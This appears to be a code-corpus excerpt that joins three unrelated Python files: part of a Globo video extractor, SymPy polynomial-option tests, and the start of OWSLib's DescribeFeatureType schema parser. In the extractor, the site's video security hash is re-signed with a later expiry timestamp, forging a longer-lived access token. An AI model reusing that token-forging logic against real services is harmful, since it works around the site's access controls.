'ext': 'mp4',
'title': 'Os gols de Atlético-MG 3 x 2 Santos pela 24ª rodada do Brasileirão',
'duration': 251.585,
'uploader': 'SporTV',
'uploader_id': 698,
'like_count': int,
}
},
{
'url': 'http://g1.globo.com/carros/autoesporte/videos/t/exclusivos-do-g1/v/mercedes-benz-gla-passa-por-teste-de-colisao-na-europa/3607726/',
'md5': 'b3ccc801f75cd04a914d51dadb83a78d',
'info_dict': {
'id': '3607726',
'ext': 'mp4',
'title': 'Mercedes-Benz GLA passa por teste de colisão na Europa',
'duration': 103.204,
'uploader': 'Globo.com',
'uploader_id': 265,
'like_count': int,
}
},
{
'url': 'http://g1.globo.com/jornal-nacional/noticia/2014/09/novidade-na-fiscalizacao-de-bagagem-pela-receita-provoca-discussoes.html',
'md5': '307fdeae4390ccfe6ba1aa198cf6e72b',
'info_dict': {
'id': '3652183',
'ext': 'mp4',
'title': 'Receita Federal explica como vai fiscalizar bagagens de quem retorna ao Brasil de avião',
'duration': 110.711,
'uploader': 'Rede Globo',
'uploader_id': 196,
'like_count': int,
}
},
]
class MD5():
HEX_FORMAT_LOWERCASE = 0
HEX_FORMAT_UPPERCASE = 1
BASE64_PAD_CHARACTER_DEFAULT_COMPLIANCE = ''
BASE64_PAD_CHARACTER_RFC_COMPLIANCE = '='
PADDING = '=0xFF01DD'
hexcase = 0
b64pad = ''
def __init__(self):
pass
class JSArray(list):
def __getitem__(self, y):
try:
return list.__getitem__(self, y)
except IndexError:
return 0
def __setitem__(self, i, y):
try:
return list.__setitem__(self, i, y)
except IndexError:
self.extend([0] * (i - len(self) + 1))
self[-1] = y
@classmethod
def hex_md5(cls, param1):
return cls.rstr2hex(cls.rstr_md5(cls.str2rstr_utf8(param1)))
@classmethod
def b64_md5(cls, param1, param2=None):
return cls.rstr2b64(cls.rstr_md5(cls.str2rstr_utf8(param1, param2)))
@classmethod
def any_md5(cls, param1, param2):
return cls.rstr2any(cls.rstr_md5(cls.str2rstr_utf8(param1)), param2)
@classmethod
def rstr_md5(cls, param1):
return cls.binl2rstr(cls.binl_md5(cls.rstr2binl(param1), len(param1) * 8))
@classmethod
def rstr2hex(cls, param1):
_loc_2 = '0123456789ABCDEF' if cls.hexcase else '0123456789abcdef'
_loc_3 = ''
for _loc_5 in range(0, len(param1)):
_loc_4 = compat_ord(param1[_loc_5])
_loc_3 += _loc_2[_loc_4 >> 4 & 15] + _loc_2[_loc_4 & 15]
return _loc_3
@classmethod
def rstr2b64(cls, param1):
_loc_2 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_'
_loc_3 = ''
_loc_4 = len(param1)
for _loc_5 in range(0, _loc_4, 3):
_loc_6_1 = compat_ord(param1[_loc_5]) << 16
_loc_6_2 = compat_ord(param1[_loc_5 + 1]) << 8 if _loc_5 + 1 < _loc_4 else 0
_loc_6_3 = compat_ord(param1[_loc_5 + 2]) if _loc_5 + 2 < _loc_4 else 0
_loc_6 = _loc_6_1 | _loc_6_2 | _loc_6_3
for _loc_7 in range(0, 4):
if _loc_5 * 8 + _loc_7 * 6 > len(param1) * 8:
_loc_3 += cls.b64pad
else:
_loc_3 += _loc_2[_loc_6 >> 6 * (3 - _loc_7) & 63]
return _loc_3
@staticmethod
def rstr2any(param1, param2):
_loc_3 = len(param2)
_loc_4 = []
_loc_9 = [0] * ((len(param1) >> 2) + 1)
for _loc_5 in range(0, len(_loc_9)):
_loc_9[_loc_5] = compat_ord(param1[_loc_5 * 2]) << 8 | compat_ord(param1[_loc_5 * 2 + 1])
while len(_loc_9) > 0:
_loc_8 = []
_loc_7 = 0
for _loc_5 in range(0, len(_loc_9)):
_loc_7 = (_loc_7 << 16) + _loc_9[_loc_5]
_loc_6 = math.floor(_loc_7 / _loc_3)
_loc_7 -= _loc_6 * _loc_3
if len(_loc_8) > 0 or _loc_6 > 0:
_loc_8[len(_loc_8)] = _loc_6
_loc_4[len(_loc_4)] = _loc_7
_loc_9 = _loc_8
_loc_10 = ''
_loc_5 = len(_loc_4) - 1
while _loc_5 >= 0:
_loc_10 += param2[_loc_4[_loc_5]]
_loc_5 -= 1
return _loc_10
@classmethod
def str2rstr_utf8(cls, param1, param2=None):
_loc_3 = ''
_loc_4 = -1
if not param2:
param2 = cls.PADDING
param1 = param1 + param2[1:9]
while True:
_loc_4 += 1
if _loc_4 >= len(param1):
break
_loc_5 = compat_ord(param1[_loc_4])
_loc_6 = compat_ord(param1[_loc_4 + 1]) if _loc_4 + 1 < len(param1) else 0
if 55296 <= _loc_5 <= 56319 and 56320 <= _loc_6 <= 57343:
_loc_5 = 65536 + ((_loc_5 & 1023) << 10) + (_loc_6 & 1023)
_loc_4 += 1
if _loc_5 <= 127:
_loc_3 += compat_chr(_loc_5)
continue
if _loc_5 <= 2047:
_loc_3 += compat_chr(192 | _loc_5 >> 6 & 31) + compat_chr(128 | _loc_5 & 63)
continue
if _loc_5 <= 65535:
_loc_3 += compat_chr(224 | _loc_5 >> 12 & 15) + compat_chr(128 | _loc_5 >> 6 & 63) + compat_chr(
128 | _loc_5 & 63)
continue
if _loc_5 <= 2097151:
_loc_3 += compat_chr(240 | _loc_5 >> 18 & 7) + compat_chr(128 | _loc_5 >> 12 & 63) + compat_chr(
128 | _loc_5 >> 6 & 63) + compat_chr(128 | _loc_5 & 63)
return _loc_3
@staticmethod
def rstr2binl(param1):
_loc_2 = [0] * ((len(param1) >> 2) + 1)
for _loc_3 in range(0, len(_loc_2)):
_loc_2[_loc_3] = 0
for _loc_3 in range(0, len(param1) * 8, 8):
_loc_2[_loc_3 >> 5] |= (compat_ord(param1[_loc_3 // 8]) & 255) << _loc_3 % 32
return _loc_2
@staticmethod
def binl2rstr(param1):
_loc_2 = ''
for _loc_3 in range(0, len(param1) * 32, 8):
_loc_2 += compat_chr(param1[_loc_3 >> 5] >> _loc_3 % 32 & 255)
return _loc_2
@classmethod
def binl_md5(cls, param1, param2):
param1 = cls.JSArray(param1)
param1[param2 >> 5] |= 128 << param2 % 32
param1[(param2 + 64 >> 9 << 4) + 14] = param2
_loc_3 = 1732584193
_loc_4 = -271733879
_loc_5 = -1732584194
_loc_6 = 271733878
for _loc_7 in range(0, len(param1), 16):
_loc_8 = _loc_3
_loc_9 = _loc_4
_loc_10 = _loc_5
_loc_11 = _loc_6
_loc_3 = cls.md5_ff(_loc_3, _loc_4, _loc_5, _loc_6, param1[_loc_7 + 0], 7, -680876936)
_loc_6 = cls.md5_ff(_loc_6, _loc_3, _loc_4, _loc_5, param1[_loc_7 + 1], 12, -389564586)
_loc_5 = cls.md5_ff(_loc_5, _loc_6, _loc_3, _loc_4, param1[_loc_7 + 2], 17, 606105819)
_loc_4 = cls.md5_ff(_loc_4, _loc_5, _loc_6, _loc_3, param1[_loc_7 + 3], 22, -1044525330)
_loc_3 = cls.md5_ff(_loc_3, _loc_4, _loc_5, _loc_6, param1[_loc_7 + 4], 7, -176418897)
_loc_6 = cls.md5_ff(_loc_6, _loc_3, _loc_4, _loc_5, param1[_loc_7 + 5], 12, 1200080426)
_loc_5 = cls.md5_ff(_loc_5, _loc_6, _loc_3, _loc_4, param1[_loc_7 + 6], 17, -1473231341)
_loc_4 = cls.md5_ff(_loc_4, _loc_5, _loc_6, _loc_3, param1[_loc_7 + 7], 22, -45705983)
_loc_3 = cls.md5_ff(_loc_3, _loc_4, _loc_5, _loc_6, param1[_loc_7 + 8], 7, 1770035416)
_loc_6 = cls.md5_ff(_loc_6, _loc_3, _loc_4, _loc_5, param1[_loc_7 + 9], 12, -1958414417)
_loc_5 = cls.md5_ff(_loc_5, _loc_6, _loc_3, _loc_4, param1[_loc_7 + 10], 17, -42063)
_loc_4 = cls.md5_ff(_loc_4, _loc_5, _loc_6, _loc_3, param1[_loc_7 + 11], 22, -1990404162)
_loc_3 = cls.md5_ff(_loc_3, _loc_4, _loc_5, _loc_6, param1[_loc_7 + 12], 7, 1804603682)
_loc_6 = cls.md5_ff(_loc_6, _loc_3, _loc_4, _loc_5, param1[_loc_7 + 13], 12, -40341101)
_loc_5 = cls.md5_ff(_loc_5, _loc_6, _loc_3, _loc_4, param1[_loc_7 + 14], 17, -1502002290)
_loc_4 = cls.md5_ff(_loc_4, _loc_5, _loc_6, _loc_3, param1[_loc_7 + 15], 22, 1236535329)
_loc_3 = cls.md5_gg(_loc_3, _loc_4, _loc_5, _loc_6, param1[_loc_7 + 1], 5, -165796510)
_loc_6 = cls.md5_gg(_loc_6, _loc_3, _loc_4, _loc_5, param1[_loc_7 + 6], 9, -1069501632)
_loc_5 = cls.md5_gg(_loc_5, _loc_6, _loc_3, _loc_4, param1[_loc_7 + 11], 14, 643717713)
_loc_4 = cls.md5_gg(_loc_4, _loc_5, _loc_6, _loc_3, param1[_loc_7 + 0], 20, -373897302)
_loc_3 = cls.md5_gg(_loc_3, _loc_4, _loc_5, _loc_6, param1[_loc_7 + 5], 5, -701558691)
_loc_6 = cls.md5_gg(_loc_6, _loc_3, _loc_4, _loc_5, param1[_loc_7 + 10], 9, 38016083)
_loc_5 = cls.md5_gg(_loc_5, _loc_6, _loc_3, _loc_4, param1[_loc_7 + 15], 14, -660478335)
_loc_4 = cls.md5_gg(_loc_4, _loc_5, _loc_6, _loc_3, param1[_loc_7 + 4], 20, -405537848)
_loc_3 = cls.md5_gg(_loc_3, _loc_4, _loc_5, _loc_6, param1[_loc_7 + 9], 5, 568446438)
_loc_6 = cls.md5_gg(_loc_6, _loc_3, _loc_4, _loc_5, param1[_loc_7 + 14], 9, -1019803690)
_loc_5 = cls.md5_gg(_loc_5, _loc_6, _loc_3, _loc_4, param1[_loc_7 + 3], 14, -187363961)
_loc_4 = cls.md5_gg(_loc_4, _loc_5, _loc_6, _loc_3, param1[_loc_7 + 8], 20, 1163531501)
_loc_3 = cls.md5_gg(_loc_3, _loc_4, _loc_5, _loc_6, param1[_loc_7 + 13], 5, -1444681467)
_loc_6 = cls.md5_gg(_loc_6, _loc_3, _loc_4, _loc_5, param1[_loc_7 + 2], 9, -51403784)
_loc_5 = cls.md5_gg(_loc_5, _loc_6, _loc_3, _loc_4, param1[_loc_7 + 7], 14, 1735328473)
_loc_4 = cls.md5_gg(_loc_4, _loc_5, _loc_6, _loc_3, param1[_loc_7 + 12], 20, -1926607734)
_loc_3 = cls.md5_hh(_loc_3, _loc_4, _loc_5, _loc_6, param1[_loc_7 + 5], 4, -378558)
_loc_6 = cls.md5_hh(_loc_6, _loc_3, _loc_4, _loc_5, param1[_loc_7 + 8], 11, -2022574463)
_loc_5 = cls.md5_hh(_loc_5, _loc_6, _loc_3, _loc_4, param1[_loc_7 + 11], 16, 1839030562)
_loc_4 = cls.md5_hh(_loc_4, _loc_5, _loc_6, _loc_3, param1[_loc_7 + 14], 23, -35309556)
_loc_3 = cls.md5_hh(_loc_3, _loc_4, _loc_5, _loc_6, param1[_loc_7 + 1], 4, -1530992060)
_loc_6 = cls.md5_hh(_loc_6, _loc_3, _loc_4, _loc_5, param1[_loc_7 + 4], 11, 1272893353)
_loc_5 = cls.md5_hh(_loc_5, _loc_6, _loc_3, _loc_4, param1[_loc_7 + 7], 16, -155497632)
_loc_4 = cls.md5_hh(_loc_4, _loc_5, _loc_6, _loc_3, param1[_loc_7 + 10], 23, -1094730640)
_loc_3 = cls.md5_hh(_loc_3, _loc_4, _loc_5, _loc_6, param1[_loc_7 + 13], 4, 681279174)
_loc_6 = cls.md5_hh(_loc_6, _loc_3, _loc_4, _loc_5, param1[_loc_7 + 0], 11, -358537222)
_loc_5 = cls.md5_hh(_loc_5, _loc_6, _loc_3, _loc_4, param1[_loc_7 + 3], 16, -722521979)
_loc_4 = cls.md5_hh(_loc_4, _loc_5, _loc_6, _loc_3, param1[_loc_7 + 6], 23, 76029189)
_loc_3 = cls.md5_hh(_loc_3, _loc_4, _loc_5, _loc_6, param1[_loc_7 + 9], 4, -640364487)
_loc_6 = cls.md5_hh(_loc_6, _loc_3, _loc_4, _loc_5, param1[_loc_7 + 12], 11, -421815835)
_loc_5 = cls.md5_hh(_loc_5, _loc_6, _loc_3, _loc_4, param1[_loc_7 + 15], 16, 530742520)
_loc_4 = cls.md5_hh(_loc_4, _loc_5, _loc_6, _loc_3, param1[_loc_7 + 2], 23, -995338651)
_loc_3 = cls.md5_ii(_loc_3, _loc_4, _loc_5, _loc_6, param1[_loc_7 + 0], 6, -198630844)
_loc_6 = cls.md5_ii(_loc_6, _loc_3, _loc_4, _loc_5, param1[_loc_7 + 7], 10, 1126891415)
_loc_5 = cls.md5_ii(_loc_5, _loc_6, _loc_3, _loc_4, param1[_loc_7 + 14], 15, -1416354905)
_loc_4 = cls.md5_ii(_loc_4, _loc_5, _loc_6, _loc_3, param1[_loc_7 + 5], 21, -57434055)
_loc_3 = cls.md5_ii(_loc_3, _loc_4, _loc_5, _loc_6, param1[_loc_7 + 12], 6, 1700485571)
_loc_6 = cls.md5_ii(_loc_6, _loc_3, _loc_4, _loc_5, param1[_loc_7 + 3], 10, -1894986606)
_loc_5 = cls.md5_ii(_loc_5, _loc_6, _loc_3, _loc_4, param1[_loc_7 + 10], 15, -1051523)
_loc_4 = cls.md5_ii(_loc_4, _loc_5, _loc_6, _loc_3, param1[_loc_7 + 1], 21, -2054922799)
_loc_3 = cls.md5_ii(_loc_3, _loc_4, _loc_5, _loc_6, param1[_loc_7 + 8], 6, 1873313359)
_loc_6 = cls.md5_ii(_loc_6, _loc_3, _loc_4, _loc_5, param1[_loc_7 + 15], 10, -30611744)
_loc_5 = cls.md5_ii(_loc_5, _loc_6, _loc_3, _loc_4, param1[_loc_7 + 6], 15, -1560198380)
_loc_4 = cls.md5_ii(_loc_4, _loc_5, _loc_6, _loc_3, param1[_loc_7 + 13], 21, 1309151649)
_loc_3 = cls.md5_ii(_loc_3, _loc_4, _loc_5, _loc_6, param1[_loc_7 + 4], 6, -145523070)
_loc_6 = cls.md5_ii(_loc_6, _loc_3, _loc_4, _loc_5, param1[_loc_7 + 11], 10, -1120210379)
_loc_5 = cls.md5_ii(_loc_5, _loc_6, _loc_3, _loc_4, param1[_loc_7 + 2], 15, 718787259)
_loc_4 = cls.md5_ii(_loc_4, _loc_5, _loc_6, _loc_3, param1[_loc_7 + 9], 21, -343485551)
_loc_3 = cls.safe_add(_loc_3, _loc_8)
_loc_4 = cls.safe_add(_loc_4, _loc_9)
_loc_5 = cls.safe_add(_loc_5, _loc_10)
_loc_6 = cls.safe_add(_loc_6, _loc_11)
return [_loc_3, _loc_4, _loc_5, _loc_6]
@classmethod
def md5_cmn(cls, param1, param2, param3, param4, param5, param6):
return cls.safe_add(
cls.bit_rol(cls.safe_add(cls.safe_add(param2, param1), cls.safe_add(param4, param6)), param5), param3)
@classmethod
def md5_ff(cls, param1, param2, param3, param4, param5, param6, param7):
return cls.md5_cmn(param2 & param3 | ~param2 & param4, param1, param2, param5, param6, param7)
@classmethod
def md5_gg(cls, param1, param2, param3, param4, param5, param6, param7):
return cls.md5_cmn(param2 & param4 | param3 & ~param4, param1, param2, param5, param6, param7)
@classmethod
def md5_hh(cls, param1, param2, param3, param4, param5, param6, param7):
return cls.md5_cmn(param2 ^ param3 ^ param4, param1, param2, param5, param6, param7)
@classmethod
def md5_ii(cls, param1, param2, param3, param4, param5, param6, param7):
return cls.md5_cmn(param3 ^ (param2 | ~param4), param1, param2, param5, param6, param7)
@classmethod
def safe_add(cls, param1, param2):
_loc_3 = (param1 & 65535) + (param2 & 65535)
_loc_4 = (param1 >> 16) + (param2 >> 16) + (_loc_3 >> 16)
return cls.lshift(_loc_4, 16) | _loc_3 & 65535
@classmethod
def bit_rol(cls, param1, param2):
return cls.lshift(param1, param2) | (param1 & 0xFFFFFFFF) >> (32 - param2)
@staticmethod
def lshift(value, count):
r = (0xFFFFFFFF & value) << count
return -(~(r - 1) & 0xFFFFFFFF) if r > 0x7FFFFFFF else r
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
video_id = self._search_regex(self._VIDEOID_REGEXES, webpage, 'video id')
video = self._download_json(
self._API_URL_TEMPLATE % video_id, video_id)['videos'][0]
title = video['title']
duration = float_or_none(video['duration'], 1000)
like_count = video['likes']
uploader = video['channel']
uploader_id = video['channel_id']
formats = []
for resource in video['resources']:
resource_id = resource.get('_id')
if not resource_id:
continue
security = self._download_json(
self._SECURITY_URL_TEMPLATE % (video_id, resource_id),
video_id, 'Downloading security hash for %s' % resource_id)
security_hash = security.get('hash')
if not security_hash:
message = security.get('message')
if message:
raise ExtractorError(
'%s returned error: %s' % (self.IE_NAME, message), expected=True)
continue
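            # Layout of the security hash (per the slices below): a 2-char hash
            # code, a 10-digit timestamp, a 10-char random salt, then an MD5
            # part; re-signing extends the expiry and appends a fresh salted MD5.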
hash_code = security_hash[:2]
received_time = int(security_hash[2:12])
received_random = security_hash[12:22]
received_md5 = security_hash[22:]
sign_time = received_time + self._RESIGN_EXPIRATION
padding = '%010d' % random.randint(1, 10000000000)
signed_md5 = self.MD5.b64_md5(received_md5 + compat_str(sign_time) + padding)
signed_hash = hash_code + compat_str(received_time) + received_random + compat_str(sign_time) + padding + signed_md5
formats.append({
'url': '%s?h=%s&k=%s' % (resource['url'], signed_hash, 'flash'),
'format_id': resource_id,
'height': resource['height']
})
self._sort_formats(formats)
return {
'id': video_id,
'title': title,
'duration': duration,
'uploader': uploader,
'uploader_id': uploader_id,
'like_count': like_count,
'formats': formats
}
| unlicense |
NikNitro/Python-iBeacon-Scan | sympy/polys/tests/test_polyoptions.py | 38 | 11959 | """Tests for options manager for :class:`Poly` and public API functions. """
from sympy.polys.polyoptions import (
Options, Expand, Gens, Wrt, Sort, Order, Field, Greedy, Domain,
Split, Gaussian, Extension, Modulus, Symmetric, Strict, Auto,
Frac, Formal, Polys, Include, All, Gen, Symbols, Method)
from sympy.polys.orderings import lex
from sympy.polys.domains import FF, GF, ZZ, QQ, EX
from sympy.polys.polyerrors import OptionError, GeneratorsError
from sympy import Integer, Symbol, I, sqrt
from sympy.utilities.pytest import raises
from sympy.abc import x, y, z
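# The tests below exercise each option class' preprocess()/postprocess() hook:
# preprocess() normalises raw user input, while postprocess() adjusts the
# assembled options dict (e.g. deriving `domain` from `gaussian`/`extension`).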
def test_Options_clone():
opt = Options((x, y, z), {'domain': 'ZZ'})
assert opt.gens == (x, y, z)
assert opt.domain == ZZ
assert ('order' in opt) is False
new_opt = opt.clone({'gens': (x, y), 'order': 'lex'})
assert opt.gens == (x, y, z)
assert opt.domain == ZZ
assert ('order' in opt) is False
assert new_opt.gens == (x, y)
assert new_opt.domain == ZZ
assert ('order' in new_opt) is True
def test_Expand_preprocess():
assert Expand.preprocess(False) is False
assert Expand.preprocess(True) is True
assert Expand.preprocess(0) is False
assert Expand.preprocess(1) is True
raises(OptionError, lambda: Expand.preprocess(x))
def test_Expand_postprocess():
opt = {'expand': True}
Expand.postprocess(opt)
assert opt == {'expand': True}
def test_Gens_preprocess():
assert Gens.preprocess((None,)) == ()
assert Gens.preprocess((x, y, z)) == (x, y, z)
assert Gens.preprocess(((x, y, z),)) == (x, y, z)
a = Symbol('a', commutative=False)
raises(GeneratorsError, lambda: Gens.preprocess((x, x, y)))
raises(GeneratorsError, lambda: Gens.preprocess((x, y, a)))
def test_Gens_postprocess():
opt = {'gens': (x, y)}
Gens.postprocess(opt)
assert opt == {'gens': (x, y)}
def test_Wrt_preprocess():
assert Wrt.preprocess(x) == ['x']
assert Wrt.preprocess('') == []
assert Wrt.preprocess(' ') == []
assert Wrt.preprocess('x,y') == ['x', 'y']
assert Wrt.preprocess('x y') == ['x', 'y']
assert Wrt.preprocess('x, y') == ['x', 'y']
assert Wrt.preprocess('x , y') == ['x', 'y']
assert Wrt.preprocess(' x, y') == ['x', 'y']
assert Wrt.preprocess(' x, y') == ['x', 'y']
assert Wrt.preprocess([x, y]) == ['x', 'y']
raises(OptionError, lambda: Wrt.preprocess(','))
raises(OptionError, lambda: Wrt.preprocess(0))
def test_Wrt_postprocess():
opt = {'wrt': ['x']}
Wrt.postprocess(opt)
assert opt == {'wrt': ['x']}
def test_Sort_preprocess():
assert Sort.preprocess([x, y, z]) == ['x', 'y', 'z']
assert Sort.preprocess((x, y, z)) == ['x', 'y', 'z']
assert Sort.preprocess('x > y > z') == ['x', 'y', 'z']
assert Sort.preprocess('x>y>z') == ['x', 'y', 'z']
raises(OptionError, lambda: Sort.preprocess(0))
raises(OptionError, lambda: Sort.preprocess({x, y, z}))
def test_Sort_postprocess():
opt = {'sort': 'x > y'}
Sort.postprocess(opt)
assert opt == {'sort': 'x > y'}
def test_Order_preprocess():
assert Order.preprocess('lex') == lex
def test_Order_postprocess():
opt = {'order': True}
Order.postprocess(opt)
assert opt == {'order': True}
def test_Field_preprocess():
assert Field.preprocess(False) is False
assert Field.preprocess(True) is True
assert Field.preprocess(0) is False
assert Field.preprocess(1) is True
raises(OptionError, lambda: Field.preprocess(x))
def test_Field_postprocess():
opt = {'field': True}
Field.postprocess(opt)
assert opt == {'field': True}
def test_Greedy_preprocess():
assert Greedy.preprocess(False) is False
assert Greedy.preprocess(True) is True
assert Greedy.preprocess(0) is False
assert Greedy.preprocess(1) is True
raises(OptionError, lambda: Greedy.preprocess(x))
def test_Greedy_postprocess():
opt = {'greedy': True}
Greedy.postprocess(opt)
assert opt == {'greedy': True}
def test_Domain_preprocess():
assert Domain.preprocess(ZZ) == ZZ
assert Domain.preprocess(QQ) == QQ
assert Domain.preprocess(EX) == EX
assert Domain.preprocess(FF(2)) == FF(2)
assert Domain.preprocess(ZZ[x, y]) == ZZ[x, y]
assert Domain.preprocess('Z') == ZZ
assert Domain.preprocess('Q') == QQ
assert Domain.preprocess('ZZ') == ZZ
assert Domain.preprocess('QQ') == QQ
assert Domain.preprocess('EX') == EX
assert Domain.preprocess('FF(23)') == FF(23)
assert Domain.preprocess('GF(23)') == GF(23)
raises(OptionError, lambda: Domain.preprocess('Z[]'))
assert Domain.preprocess('Z[x]') == ZZ[x]
assert Domain.preprocess('Q[x]') == QQ[x]
assert Domain.preprocess('ZZ[x]') == ZZ[x]
assert Domain.preprocess('QQ[x]') == QQ[x]
assert Domain.preprocess('Z[x,y]') == ZZ[x, y]
assert Domain.preprocess('Q[x,y]') == QQ[x, y]
assert Domain.preprocess('ZZ[x,y]') == ZZ[x, y]
assert Domain.preprocess('QQ[x,y]') == QQ[x, y]
raises(OptionError, lambda: Domain.preprocess('Z()'))
assert Domain.preprocess('Z(x)') == ZZ.frac_field(x)
assert Domain.preprocess('Q(x)') == QQ.frac_field(x)
assert Domain.preprocess('ZZ(x)') == ZZ.frac_field(x)
assert Domain.preprocess('QQ(x)') == QQ.frac_field(x)
assert Domain.preprocess('Z(x,y)') == ZZ.frac_field(x, y)
assert Domain.preprocess('Q(x,y)') == QQ.frac_field(x, y)
assert Domain.preprocess('ZZ(x,y)') == ZZ.frac_field(x, y)
assert Domain.preprocess('QQ(x,y)') == QQ.frac_field(x, y)
assert Domain.preprocess('Q<I>') == QQ.algebraic_field(I)
assert Domain.preprocess('QQ<I>') == QQ.algebraic_field(I)
assert Domain.preprocess('Q<sqrt(2), I>') == QQ.algebraic_field(sqrt(2), I)
assert Domain.preprocess(
'QQ<sqrt(2), I>') == QQ.algebraic_field(sqrt(2), I)
raises(OptionError, lambda: Domain.preprocess('abc'))
def test_Domain_postprocess():
raises(GeneratorsError, lambda: Domain.postprocess({'gens': (x, y),
'domain': ZZ[y, z]}))
raises(GeneratorsError, lambda: Domain.postprocess({'gens': (),
'domain': EX}))
raises(GeneratorsError, lambda: Domain.postprocess({'domain': EX}))
def test_Split_preprocess():
assert Split.preprocess(False) is False
assert Split.preprocess(True) is True
assert Split.preprocess(0) is False
assert Split.preprocess(1) is True
raises(OptionError, lambda: Split.preprocess(x))
def test_Split_postprocess():
raises(NotImplementedError, lambda: Split.postprocess({'split': True}))
def test_Gaussian_preprocess():
assert Gaussian.preprocess(False) is False
assert Gaussian.preprocess(True) is True
assert Gaussian.preprocess(0) is False
assert Gaussian.preprocess(1) is True
raises(OptionError, lambda: Gaussian.preprocess(x))
def test_Gaussian_postprocess():
opt = {'gaussian': True}
Gaussian.postprocess(opt)
assert opt == {
'gaussian': True,
'extension': {I},
'domain': QQ.algebraic_field(I),
}
def test_Extension_preprocess():
assert Extension.preprocess(True) is True
assert Extension.preprocess(1) is True
assert Extension.preprocess([]) is None
assert Extension.preprocess(sqrt(2)) == {sqrt(2)}
assert Extension.preprocess([sqrt(2)]) == {sqrt(2)}
assert Extension.preprocess([sqrt(2), I]) == {sqrt(2), I}
raises(OptionError, lambda: Extension.preprocess(False))
raises(OptionError, lambda: Extension.preprocess(0))
def test_Extension_postprocess():
opt = {'extension': {sqrt(2)}}
Extension.postprocess(opt)
assert opt == {
'extension': {sqrt(2)},
'domain': QQ.algebraic_field(sqrt(2)),
}
opt = {'extension': True}
Extension.postprocess(opt)
assert opt == {'extension': True}
def test_Modulus_preprocess():
assert Modulus.preprocess(23) == 23
assert Modulus.preprocess(Integer(23)) == 23
raises(OptionError, lambda: Modulus.preprocess(0))
raises(OptionError, lambda: Modulus.preprocess(x))
def test_Modulus_postprocess():
opt = {'modulus': 5}
Modulus.postprocess(opt)
assert opt == {
'modulus': 5,
'domain': FF(5),
}
opt = {'modulus': 5, 'symmetric': False}
Modulus.postprocess(opt)
assert opt == {
'modulus': 5,
'domain': FF(5, False),
'symmetric': False,
}
def test_Symmetric_preprocess():
assert Symmetric.preprocess(False) is False
assert Symmetric.preprocess(True) is True
assert Symmetric.preprocess(0) is False
assert Symmetric.preprocess(1) is True
raises(OptionError, lambda: Symmetric.preprocess(x))
def test_Symmetric_postprocess():
opt = {'symmetric': True}
Symmetric.postprocess(opt)
assert opt == {'symmetric': True}
def test_Strict_preprocess():
assert Strict.preprocess(False) is False
assert Strict.preprocess(True) is True
assert Strict.preprocess(0) is False
assert Strict.preprocess(1) is True
raises(OptionError, lambda: Strict.preprocess(x))
def test_Strict_postprocess():
opt = {'strict': True}
Strict.postprocess(opt)
assert opt == {'strict': True}
def test_Auto_preprocess():
assert Auto.preprocess(False) is False
assert Auto.preprocess(True) is True
assert Auto.preprocess(0) is False
assert Auto.preprocess(1) is True
raises(OptionError, lambda: Auto.preprocess(x))
def test_Auto_postprocess():
opt = {'auto': True}
Auto.postprocess(opt)
assert opt == {'auto': True}
def test_Frac_preprocess():
assert Frac.preprocess(False) is False
assert Frac.preprocess(True) is True
assert Frac.preprocess(0) is False
assert Frac.preprocess(1) is True
raises(OptionError, lambda: Frac.preprocess(x))
def test_Frac_postprocess():
opt = {'frac': True}
Frac.postprocess(opt)
assert opt == {'frac': True}
def test_Formal_preprocess():
assert Formal.preprocess(False) is False
assert Formal.preprocess(True) is True
assert Formal.preprocess(0) is False
assert Formal.preprocess(1) is True
raises(OptionError, lambda: Formal.preprocess(x))
def test_Formal_postprocess():
opt = {'formal': True}
Formal.postprocess(opt)
assert opt == {'formal': True}
def test_Polys_preprocess():
assert Polys.preprocess(False) is False
assert Polys.preprocess(True) is True
assert Polys.preprocess(0) is False
assert Polys.preprocess(1) is True
raises(OptionError, lambda: Polys.preprocess(x))
def test_Polys_postprocess():
opt = {'polys': True}
Polys.postprocess(opt)
assert opt == {'polys': True}
def test_Include_preprocess():
assert Include.preprocess(False) is False
assert Include.preprocess(True) is True
assert Include.preprocess(0) is False
assert Include.preprocess(1) is True
raises(OptionError, lambda: Include.preprocess(x))
def test_Include_postprocess():
opt = {'include': True}
Include.postprocess(opt)
assert opt == {'include': True}
def test_All_preprocess():
assert All.preprocess(False) is False
assert All.preprocess(True) is True
assert All.preprocess(0) is False
assert All.preprocess(1) is True
raises(OptionError, lambda: All.preprocess(x))
def test_All_postprocess():
opt = {'all': True}
All.postprocess(opt)
assert opt == {'all': True}
def test_Gen_postprocess():
opt = {'gen': x}
Gen.postprocess(opt)
assert opt == {'gen': x}
def test_Symbols_preprocess():
raises(OptionError, lambda: Symbols.preprocess(x))
def test_Symbols_postprocess():
opt = {'symbols': [x, y, z]}
Symbols.postprocess(opt)
assert opt == {'symbols': [x, y, z]}
def test_Method_preprocess():
raises(OptionError, lambda: Method.preprocess(10))
def test_Method_postprocess():
opt = {'method': 'f5b'}
Method.postprocess(opt)
assert opt == {'method': 'f5b'}
| gpl-3.0 |
tomkralidis/OWSLib | owslib/feature/schema.py | 3 | 5536 | # =============================================================================
# OWSLib. Copyright (C) 2015 Jachym Cepicky
#
# Contact email: [email protected]
#
# =============================================================================
"""
Set of functions, which are suitable for DescribeFeatureType parsing and
generating layer schema description compatible with `fiona`
"""
import sys
from urllib.parse import urlencode, parse_qsl
from owslib.etree import etree
from owslib.namespaces import Namespaces
from owslib.util import which_etree, findall, Authentication, openURL
MYNS = Namespaces()
XS_NAMESPACE = MYNS.get_namespace("xs")
GML_NAMESPACES = (
MYNS.get_namespace("gml"),
MYNS.get_namespace("gml311"),
MYNS.get_namespace("gml32"),
)
def get_schema(
url, typename, version="1.0.0", timeout=30, headers=None, username=None, password=None, auth=None
):
"""Parses DescribeFeatureType response and creates schema compatible
with :class:`fiona`
:param str url: url of the service
:param str version: version of the service
:param str typename: name of the layer
:param int timeout: request timeout
:param str username: service authentication username
:param str password: service authentication password
:param Authentication auth: instance of owslib.util.Authentication
"""
if auth:
if username:
auth.username = username
if password:
auth.password = password
else:
auth = Authentication(username, password)
url = _get_describefeaturetype_url(url, version, typename)
root = _get_remote_describefeaturetype(url, timeout=timeout,
headers=headers, auth=auth)
if ":" in typename:
typename = typename.split(":")[1]
type_element = root.find("./{%s}element" % XS_NAMESPACE)
if type_element is None:
return None
complex_type = type_element.attrib["type"].split(":")[1]
elements = _get_elements(complex_type, root)
nsmap = None
